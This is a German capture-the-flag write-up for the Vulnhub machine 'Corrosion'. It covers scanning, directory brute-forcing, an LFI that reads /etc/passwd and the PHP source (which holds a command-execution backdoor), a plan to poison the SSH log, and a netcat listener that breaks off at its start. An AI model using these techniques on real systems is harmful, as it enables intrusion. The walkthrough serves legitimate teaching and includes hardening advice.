Corrosion - Vulnhub - Level: Easy - Bericht

Reconnaissance

192.168.2.122	08:00:27:5d:6f:d2	PCS Systemtechnik GmbH
                    

Analyse: Der Befehl `arp-scan -l` wird verwendet, um das lokale Netzwerk (Subnetz) nach aktiven Hosts zu durchsuchen. Er sendet ARP-Anfragen (Address Resolution Protocol) an alle möglichen IP-Adressen im lokalen Netzwerk und listet die Hosts auf, die mit ihrer IP- und MAC-Adresse antworten. `-l` steht für `--localnet`, was den Scan auf das direkt verbundene Netzwerk beschränkt.

Bewertung: Dieser Schritt ist grundlegend in der Reconnaissance-Phase. Das Ergebnis zeigt einen aktiven Host mit der IP-Adresse `192.168.2.122` und der MAC-Adresse `08:00:27:5d:6f:d2`. Die MAC-Adresse wird von `PCS Systemtechnik GmbH` registriert, was oft ein Hinweis auf eine virtuelle Maschine ist (VirtualBox verwendet MAC-Adressen, die diesem Hersteller zugeordnet sind). Dies ist unser Zielsystem.

Empfehlung (Pentester): Die identifizierte IP-Adresse ist der Ausgangspunkt für weitere Scans (z.B. Portscans mit Nmap). Die Information über eine mögliche VM kann für spätere Schritte (z.B. Exploit-Auswahl) relevant sein.
Empfehlung (Admin): Netzwerksegmentierung und Monitoring können helfen, die Sichtbarkeit von Systemen im Netzwerk zu kontrollieren und unautorisierte Scans zu erkennen. ARP-Spoofing-Detection kann ebenfalls sinnvoll sein.

22/tcp open  ssh     OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
                    

Analyse: Dieser Nmap-Befehl führt einen schnellen Scan durch, um offene TCP-Ports auf dem Ziel `192.168.2.122` zu identifizieren. * `-sS`: Führt einen TCP SYN-Scan (Stealth Scan) durch, der schneller und unauffälliger als ein voller TCP Connect-Scan ist. * `-sC`: Führt Standard-Nmap-Skripte (NSE - Nmap Scripting Engine) zur Diensterkennung und Schwachstellenprüfung auf den gefundenen offenen Ports aus. * `-T5`: Setzt das Timing-Template auf "insane", um den Scan zu beschleunigen (potenziell auf Kosten der Genauigkeit oder Erkennung durch IDS/IPS). * `-AO`: Versucht, das Betriebssystem zu erkennen (dies ist `-O`, nicht `-AO`. `-A` wäre aggressiver Scan, der `-O`, `-sV`, `-sC` und Traceroute beinhaltet. `-AO` ist keine gültige Option, Nmap interpretiert es wahrscheinlich als `-A -O`, wobei `-A` implizit `-O` beinhaltet. Effekt ist OS-Detektion). * `-p-`: Scannt alle 65535 TCP-Ports. * `| grep open`: Filtert die Ausgabe und zeigt nur Zeilen an, die das Wort "open" enthalten, um eine schnelle Übersicht der offenen Ports zu erhalten.

Bewertung: Der Scan identifiziert zwei offene TCP-Ports: Port 22 (SSH) und Port 80 (HTTP). Die laufenden Dienste sind OpenSSH 8.4p1 und Apache httpd 2.4.46, beide auf einem Ubuntu-System. Diese Informationen sind entscheidend für die nächsten Schritte, da sie potenzielle Angriffsvektoren aufzeigen (SSH-Bruteforce/Exploits, Webserver-Schwachstellen).

Empfehlung (Pentester): Untersuche die Webanwendung auf Port 80 genauer (Verzeichnis-Bruteforce, Schwachstellenscans). Prüfe die SSH-Version auf bekannte Schwachstellen und ob schwache Anmeldedaten verwendet werden.
Empfehlung (Admin): Halte SSH und Apache auf dem neuesten Stand. Konfiguriere SSH sicher (z.B. Key-Authentifizierung, Deaktivieren von Root-Login, Fail2Ban). Konfiguriere den Webserver sicher und minimiere die Angriffsfläche.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-04 19:09 CEST
Nmap scan report for coffee.vuln (192.168.2.122)
Host is up (0.00015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Ubuntu 5ubuntu1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 0ca71c8b4e856b168cfdb7cd5f603ea4 (RSA)
|   256 0f24f465af50d3d3aa0933c3173d63c7 (ECDSA)
|_  256 b0facd7773dae47dc875a1c55f2c210a (ED25519)
80/tcp open  http    Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:5D:6F:D2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.15 ms coffee.vuln (192.168.2.122)
                    

Analyse: Dieser Befehl ist identisch mit dem vorherigen, jedoch ohne das `| grep open`. Dadurch erhalten wir die vollständige Nmap-Ausgabe. * Die offenen Ports 22 (SSH) und 80 (HTTP) werden bestätigt. * Zusätzliche Details von den `-sC` Skripten werden angezeigt: * SSH-Hostkeys werden aufgelistet. * Der HTTP-Titel der Webseite auf Port 80 ist "Apache2 Ubuntu Default Page: It works", was auf eine Standardinstallation oder eine noch nicht konfigurierte Seite hindeutet. * Der HTTP-Server-Header bestätigt Apache/2.4.46 (Ubuntu). * Die OS-Detektion (`-O`, hier als `-AO` angegeben) identifiziert das System als Linux (Kernel 4.x oder 5.x, spezifischer 4.15 - 5.6). * Die MAC-Adresse bestätigt erneut die VirtualBox VM. * Traceroute zeigt, dass das Ziel direkt erreichbar ist (1 Hop). * Nmap hat auch einen Hostnamen `coffee.vuln` ermittelt, vermutlich über Reverse DNS oder einen anderen Mechanismus.

Bewertung: Die detaillierte Ausgabe bestätigt die vorherigen Ergebnisse und liefert zusätzliche Kontextinformationen. Der Hostname `coffee.vuln` ist ein wichtiger Fund. Die Standard-Apache-Seite deutet darauf hin, dass die eigentliche Anwendung möglicherweise in einem Unterverzeichnis liegt oder noch nicht vollständig eingerichtet ist. Die spezifische OS-Version kann bei der Suche nach Kernel-Exploits helfen.

Empfehlung (Pentester): Füge den Hostnamen `coffee.vuln` zur `/etc/hosts`-Datei hinzu, um die Webanwendung unter diesem Namen zu erreichen. Konzentriere die weitere Enumeration auf den Webserver (Port 80).
Empfehlung (Admin): Entferne oder ersetze die Standard-Webseite. Konfiguriere Hostnamen und DNS korrekt. Aktualisiere das Betriebssystem und die Dienste regelmäßig.

 [Inhalt der /etc/hosts Datei nach der Bearbeitung]
 192.168.2.122      corrosion.vuln
                    

Analyse: Der Befehl `vi /etc/hosts` öffnet die lokale Hosts-Datei im Texteditor `vi`. In dieser Datei werden manuell IP-Adressen zu Hostnamen zugeordnet. Der Eintrag `192.168.2.122 corrosion.vuln` wird hinzugefügt. (Der Hostname wurde von `coffee.vuln` im Nmap-Scan zu `corrosion.vuln` geändert, was vermutlich der tatsächliche Name der Vulnhub-Maschine ist).

Bewertung: Dies ist ein wichtiger Schritt, um die Webanwendung auf dem Zielserver unter dem korrekten Hostnamen (`corrosion.vuln`) anzusprechen. Viele Webanwendungen, insbesondere solche mit virtuellen Hosts, reagieren nur korrekt, wenn sie über ihren konfigurierten Hostnamen aufgerufen werden. Ohne diesen Eintrag würde der Browser die Anfrage möglicherweise nicht korrekt an die Zielanwendung weiterleiten.

Empfehlung (Pentester): Immer wenn Nmap oder andere Tools Hostnamen aufdecken, sollten diese zur `/etc/hosts`-Datei hinzugefügt werden, um Tests gegen Webanwendungen zu erleichtern.
Empfehlung (Admin): Dies ist eine clientseitige Konfiguration und hat keine direkten Auswirkungen auf die Serversicherheit, außer dass sie Angreifern die Interaktion erleichtert. Serverseitig ist die korrekte Konfiguration von DNS und virtuellen Hosts entscheidend.

Web Enumeration

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.2.122
+ Target Hostname:    192.168.2.122
+ Target Port:        80
+ Start Time:         2023-06-04 19:10:41 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /: Server may leak inodes via ETags, header found with file /, inode: 2aa6, size: 5c84b4033ab77, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.46 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ 8102 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time:           2023-06-04 19:10:51 (GMT2) (10 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
                    

Analyse: Der Befehl `nikto -h 192.168.2.122` startet einen Webserver-Schwachstellenscanner gegen das Ziel auf Port 80. Nikto prüft auf tausende bekannte gefährliche Dateien/CGIs, veraltete Softwareversionen und serverspezifische Probleme. * `-h`: Gibt das Ziel an (hier die IP-Adresse, besser wäre der Hostname `corrosion.vuln` gewesen, um vHost-Konfigurationen zu berücksichtigen).

Bewertung: Nikto liefert mehrere interessante Ergebnisse: * Fehlende Sicherheitsheader (`X-Frame-Options`, `X-Content-Type-Options`): Dies sind Best Practices zur Härtung, aber selten direkt ausnutzbar für einen initialen Zugriff. * Mögliches iNode-Leck über ETags (CVE-2003-1418): Eine sehr alte Schwachstelle, meist von geringem Risiko. * Veraltete Apache-Version (2.4.46): Dies ist ein wichtiger Hinweis. Veraltete Software kann bekannte Schwachstellen enthalten. * Erlaubte HTTP-Methoden: Standardmethoden, nichts Ungewöhnliches. Die wichtigste Information ist die veraltete Apache-Version. Obwohl Nikto keine direkt ausnutzbaren Schwachstellen für einen Zugang gefunden hat, unterstreicht es die Notwendigkeit, die Webanwendung weiter zu untersuchen.

Empfehlung (Pentester): Recherchiere bekannte Schwachstellen für Apache 2.4.46 unter Ubuntu. Führe einen Verzeichnis- und Datei-Bruteforce durch, da Nikto keine CGI-Verzeichnisse gefunden hat und die Standardseite angezeigt wird. Nutze den Hostnamen `corrosion.vuln` für weitere Scans.
Empfehlung (Admin): Implementiere die fehlenden Sicherheitsheader (`X-Frame-Options`, `X-Content-Type-Options`). Deaktiviere die ETag-Header oder konfiguriere sie sicher, um iNode-Leaks zu verhindern. **Aktualisiere Apache dringend auf die neueste stabile Version.**

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://corrosion.vuln
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:          200,204,301,302,307,401,405
[+] Excluded Status codes: 403,404
[+] User Agent:            gobuster/3.1.0
[+] Extensions:            txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,sh,py,pl,gz,jpeg,jpg,png,html,phtml,xml,csv,dll,pdf,raw,rtf,xlsx,zip,kdbx
[+] Expanded:              true
[+] No error:              true
[+] Timeout:               10s
===============================================================
2023/06/04 19:15:00 Starting gobuster
===============================================================
http://corrosion.vuln/index.html           (Status: 200) [Size: 10918]
http://corrosion.vuln/tasks                (Status: 301) [Size: 316] [--> http://corrosion.vuln/tasks/]
http://corrosion.vuln/blog-post            (Status: 301) [Size: 320] [--> http://corrosion.vuln/blog-post/]
http://corrosion.vuln/blog-post/index.html           (Status: 200) [Size: 190]
http://corrosion.vuln/blog-post/archives             (Status: 301) [Size: 329] [--> http://corrosion.vuln/blog-post/archives/]
http://corrosion.vuln/blog-post/image.jpg            (Status: 200) [Size: 429872]
http://corrosion.vuln/blog-post/uploads              (Status: 301) [Size: 328] [--> http://corrosion.vuln/blog-post/uploads/]
===============================================================
2023/06/04 19:18:00 Finished
===============================================================
                    

Analyse: Der Befehl `gobuster dir` wird verwendet, um nach versteckten Verzeichnissen und Dateien auf dem Webserver zu suchen (Directory/File Bruteforcing). * `-u http://corrosion.vuln`: Gibt die Ziel-URL an (korrekterweise mit dem Hostnamen). * `-x ...`: Definiert eine lange Liste von Dateiendungen, die an jeden Eintrag in der Wortliste angehängt werden sollen, um nach spezifischen Dateitypen zu suchen. * `-w "/usr/share/seclists/..."`: Gibt den Pfad zur Wortliste an, die für den Bruteforce verwendet wird (`directory-list-2.3-medium.txt` aus SecLists ist eine gute Standardwahl). * `-b '403,404'`: Schließt Antworten mit den Statuscodes 403 (Forbidden) und 404 (Not Found) aus der Ausgabe aus, um irrelevante Ergebnisse zu reduzieren. * `-e`: Erweiterter Modus, zeigt die vollständige URL für gefundene Verzeichnisse an. * `--no-error`: Unterdrückt Fehlermeldungen (z.B. Verbindungsprobleme).

Bewertung: Gobuster hat mehrere interessante Pfade gefunden: * `/index.html`: Die Standard-Apache-Seite, die wir bereits kennen. * `/tasks` (und `/tasks/`): Ein neues Verzeichnis. * `/blog-post` (und `/blog-post/`): Ein weiteres neues Verzeichnis, das vielversprechend klingt. * Innerhalb von `/blog-post`: `/index.html`, `/archives/`, `/image.jpg`, `/uploads/`. Insbesondere die Verzeichnisse `/tasks`, `/blog-post`, `/blog-post/archives` und `/blog-post/uploads` sind vielversprechende Ziele für die weitere manuelle Untersuchung.

Empfehlung (Pentester): Untersuche die gefundenen Verzeichnisse `/tasks`, `/blog-post`, `/blog-post/archives` und `/blog-post/uploads` manuell im Browser. Suche nach interessanten Dateien, Konfigurationsdateien, Hinweisen oder weiteren Angriffsvektoren. Führe ggf. weitere Gobuster-Scans gezielt auf diese Unterverzeichnisse durch.
Empfehlung (Admin): Beschränke den Zugriff auf nicht öffentliche Verzeichnisse und Dateien. Deaktiviere Verzeichnislistings (Directory Indexing), falls nicht benötigt. Entferne unnötige Dateien und Verzeichnisse vom Webserver.

Analyse: Die folgenden Abschnitte sind keine Befehle, sondern stellen die manuelle Untersuchung der von Gobuster gefundenen Pfade dar.

(Seiteninhalt oder Quelltext)
 Welcome to my Blog!
 This website is in development. Will be updated in the next couple Months! - randy
                    

Bewertung: Das Verzeichnis `/blog-post/uploads/` scheint leer zu sein oder zeigt nur eine einfache Nachricht an. Der Hinweis "- randy" könnte ein Benutzername sein. Dies ist eine wertvolle Information.

Empfehlung (Pentester): Notiere den möglichen Benutzernamen "randy". Prüfe, ob Datei-Uploads in dieses Verzeichnis möglich sind (möglicherweise über die `/blog-post`-Anwendung).
Empfehlung (Admin): Stelle sicher, dass Upload-Verzeichnisse keine Ausführungsrechte haben und der Zugriff darauf beschränkt ist. Vermeide es, Benutzernamen oder interne Informationen in öffentlichen Kommentaren preiszugeben.

------------------------------------------------------------------
Index of /blog-post/archives
------------------------------------------------------------------
 Name               Last modified     Size  Description
 Parent Directory                        -
 randylogs.php      2021-07-29 17:20  140

------------------------------------------------------------------
Apache/2.4.46 (Ubuntu) Server at corrosion.vuln Port 80
------------------------------------------------------------------
                    

Bewertung: Das Verzeichnis `/blog-post/archives/` hat Directory Listing aktiviert! Das ist oft eine Fehlkonfiguration und erlaubt uns, den Inhalt des Verzeichnisses direkt zu sehen. Es enthält eine einzige Datei: `randylogs.php`. Der Name deutet auf eine Logging- oder Log-Anzeigefunktion hin, möglicherweise im Zusammenhang mit dem Benutzer "randy". PHP-Dateien sind besonders interessant, da sie serverseitigen Code ausführen.

Empfehlung (Pentester): Untersuche die Datei `randylogs.php` genauer. Rufe sie im Browser auf und prüfe ihre Funktionalität. Suche nach Parametern, die manipuliert werden können (z.B. für Local File Inclusion - LFI).
Empfehlung (Admin): Deaktiviere Directory Listing global oder zumindest für sensible Verzeichnisse in der Apache-Konfiguration (`Options -Indexes`). Benenne Skripte nicht so, dass sie ihre Funktion verraten.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:117:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:118:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
avahi:x:113:120:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:121:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:115:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
nm-openvpn:x:117:122:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
whoopsie:x:118:123::/nonexistent:/bin/false
sssd:x:119:124:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
saned:x:120:126::/var/lib/saned:/usr/sbin/nologin
colord:x:121:127:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:122:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:123:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
hplip:x:124:7:HPLIP system user,,,:/run/hplip:/bin/false
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:127:65534::/run/sshd:/usr/sbin/nologin
                    

Analyse: Hier wird versucht, eine Local File Inclusion (LFI) Schwachstelle auszunutzen. Die URL `http://corrosion.vuln/blog-post/archives/randylogs.php?file=file:///etc/passwd` wird aufgerufen. Es wird angenommen, dass das PHP-Skript den Wert des `file`-Parameters nimmt und den Inhalt der entsprechenden Datei auf dem Server ausgibt. `file:///etc/passwd` ist der Pfad zur Passwortdatei auf Linux-Systemen.

Bewertung: **Volltreffer!** Die Ausgabe zeigt den Inhalt der `/etc/passwd`-Datei. Dies bestätigt eine kritische LFI-Schwachstelle in `randylogs.php`. Wir können nun beliebige Dateien auf dem Server lesen, auf die der Webserver-Benutzer (`www-data`, wie in der Datei sichtbar) Lesezugriff hat. Wir sehen auch den Benutzer "randy" mit einer Bash-Shell (`/bin/bash`), was ihn zu einem primären Ziel für den nächsten Schritt macht.

Empfehlung (Pentester): Nutze die LFI, um weitere sensible Dateien zu lesen: Konfigurationsdateien (z.B. `/etc/apache2/apache2.conf`, anwendungs-spezifische configs), Logdateien (`/var/log/apache2/access.log`, `/var/log/auth.log`), SSH-Schlüssel (`/home/randy/.ssh/id_rsa`), und den Quellcode der PHP-Anwendung selbst (z.B. `randylogs.php`). Suche nach Anmeldedaten oder anderen Informationen, die zum Initial Access führen.
Empfehlung (Admin): **Behebe die LFI-Schwachstelle dringend!** Implementiere eine Whitelist für erlaubte Dateien oder stelle sicher, dass Benutzereingaben korrekt validiert und saniert werden, bevor sie in Dateipfadoperationen verwendet werden. Deaktiviere `allow_url_include` und beschränke `open_basedir` in der `php.ini`.

Initial Access (LFI & Command Injection)

root:x:0:0:root:/root:/bin/bash
randy:x:1000:1000:randy,,,:/home/randy:/bin/bash
                    

Analyse: Dieser Befehl verwendet `curl`, um die LFI-Schwachstelle erneut auszunutzen und den Inhalt von `/etc/passwd` abzurufen. * `-s`: Silent-Modus, unterdrückt Fortschrittsanzeigen. * `| grep bash`: Filtert die Ausgabe und zeigt nur Zeilen an, die "bash" enthalten.

Bewertung: Dies ist eine effiziente Methode, um schnell Benutzer zu identifizieren, die eine interaktive Shell (`/bin/bash`) haben und somit potenzielle Ziele für einen Login oder Privilege Escalation sind. Es bestätigt erneut die Benutzer `root` und `randy`.

Empfehlung (Pentester): Fokussiere dich auf den Benutzer `randy`, da Root-Zugriff normalerweise nicht direkt möglich ist. Versuche, über die LFI an Randys SSH-Schlüssel oder Passwort zu gelangen.
Empfehlung (Admin): Die Empfehlungen zur Behebung der LFI gelten weiterhin.

 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://corrosion.vuln/blog-post/archives/randylogs.php?file=FUZZ
Total requests: 2894

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000081:   200        48 L     85 W       2832 Ch     "/etc/passwd"
000001108:   200        75 L     75 W       1059 Ch     "/etc/group"
000001092:   200        12 L     88 W       665 Ch      "/etc/fstab"
000001093:   200        227 L    1115 W     7224 Ch     "/etc/apache2/apache2.conf"
000001089:   200        9 L      23 W       205 Ch      "/etc/hosts"
000001278:   200        1 L      52 W       321 Ch      "/proc/self/stat"
000001277:   200        0 L      1 W        27 Ch       "/proc/self/cmdline"
000001279:   200        57 L     139 W      1379 Ch     "/proc/self/status"
000001296:   200        2 L      4 W        20 Ch       "/etc/issue"
000001298:   200        23 L     205 W      1132 Ch     "/etc/crontab"
000001300:   200        1 L      23 W       179 Ch      "/proc/version"
000001311:   200        123 L    396 W      3289 Ch     "/etc/ssh/sshd_config"
000001301:   200        1 L      5 W        106 Ch      "/proc/cmdline"
000001321:   200        4 L      24 W       13050 Ch    "/var/log/wtmp"
000001320:   200        0 L      1 W        292292 Ch   "/var/log/lastlog"
000001322:   200        0 L      1 W        768 Ch      "/var/run/utmp"
000001343:   200        7491 L   111188 W   856527 Ch   "/var/log/auth.log"

Total time: 1.358221
Processed Requests: 2894
Filtered Requests: 2877
Requests/sec.: 2130.727

                    

Analyse: Hier wird `wfuzz`, ein Web-Fuzzing-Tool, eingesetzt, um die LFI-Schwachstelle systematisch zum Auffinden lesbarer Dateien zu nutzen. * `-c`: Farbige Ausgabe. * `-w /usr/share/wordlists/logfiles.txt`: Verwendet eine Wortliste, die speziell gängige Logfile-Pfade enthält. * `-u "http://...randylogs.php?file=FUZZ"`: Die Ziel-URL, wobei `FUZZ` der Platzhalter ist, der durch jeden Eintrag aus der Wortliste ersetzt wird. * `--hc 400,401,402,403,404`: Versteckt Antworten mit diesen HTTP-Statuscodes (hauptsächlich Fehler). * `--hh 0`: Versteckt Antworten mit 0 Zeichen (leere Antworten), da diese wahrscheinlich nicht existierende oder nicht lesbare Dateien sind.

Bewertung: Wfuzz findet mehrere lesbare Dateien, darunter Konfigurationsdateien (`apache2.conf`, `hosts`, `sshd_config`) und Systeminformationen (`/proc/...`). Besonders hervorzuheben ist `/var/log/auth.log`. Diese Datei protokolliert Authentifizierungsversuche, einschließlich SSH-Logins. Wenn wir diese Datei lesen und gleichzeitig einen SSH-Login-Versuch mit einem präparierten Benutzernamen durchführen, könnten wir möglicherweise Code einschleusen (Log Poisoning).

Empfehlung (Pentester): Untersuche den Inhalt von `/var/log/auth.log` genauer über die LFI. Plane einen SSH-Log-Poisoning-Angriff: Versuche, dich per SSH mit einem Benutzernamen anzumelden, der PHP-Code enthält (z.B. `ssh ''@corrosion.vuln`). Lese dann `/var/log/auth.log` über die LFI und prüfe, ob der PHP-Code ausgeführt wird, wenn die Logdatei inkludiert wird.
Empfehlung (Admin): Beschränke den Zugriff auf Logdateien so weit wie möglich. Stelle sicher, dass der Webserver-Benutzer keinen unnötigen Lesezugriff auf System-Logdateien hat. Die Behebung der LFI ist die primäre Maßnahme.

PD9waHAKICAgJGNtZCA9ICRfR0VUWydjbWQnXSA7CiAgIGlmKGlzc2V0KCRjbWQpKQogICB7CiAgICAgICBzeXN0ZW0oJGNtZCk7CiAgIH0KICAgZWxzZQogICB7CiAgICAgICBwcmludCAiV2VsY29tZSB0byBteSBCbG9nISBcblRoaXMgd2Vic2l0ZSBpcyBpbiBkZXZlbG9wbWVudC4gV2lsbCBiZSB1cGRhdGVkIGluIHRoZSBuZXh0IGNvdXBsZSBNb250aHMhIC0gcmFuZHkiOwogICB9CiAgIAogICA/PgoKPD9waHAKICAgJGZpbGUgPSAkX0dFVFsnZmlsZSddOwogICBpZihpc3NldCgkZmlsZSkpCiAgIHsKICAgICAgIGluY2x1ZGUoIiRmaWxlIik7CiAgIH0KICAgZWxzZQogICB7CiAgICAgICBpbmNsdWRlKCJpbmRleC5waHAiKTsKICAgfQogICA=
                    

Analyse:** Hier wird ein PHP-Wrapper (`php://filter`) verwendet, um den Quellcode der Datei `randylogs.php` selbst über die LFI-Schwachstelle auszulesen. * `php://filter/convert.base64-encode/resource=randylogs.php`: Dieser Teil weist PHP an, den Filter `convert.base64-encode` auf die Ressource `randylogs.php` anzuwenden, bevor sie inkludiert (und damit ausgegeben) wird. Base64-Kodierung wird verwendet, um sicherzustellen, dass der PHP-Code nicht vom Server interpretiert wird, sondern als Text ausgegeben wird.

 
 $cmd = $ GET['cmd'] ; 
  if(isset($cmd))
 {
     system($cmd);
  }
  else
  {
      print "Welcome to my Blog! \nThis website is in development. Will be updated in the next couple Months! - randy";
 }
 

 
   $file = $ GET['file'];
   if(isset($file))
   {
       include("$file"); // Hier ist die LFI
   }
   else
   {
       include("index.php"); // Standard-Include
   }
 

drwxr-xr-x  3 root  root  4096 Jul 29  2021 .
drwxr-xr-x 20 root  root  4096 Jul 29  2021 ..
drwxr-x--- 17 randy randy 4096 Jul 30  2021 randy
 from 192.168.2.113 port 40164
                    

[SSH-Verbindungsversuch mit speziellem Benutzernamen - keine direkte Ausgabe erwartet, außer evtl. Passwortabfrage oder Fehler]
                    

listening on [any] 9001 ...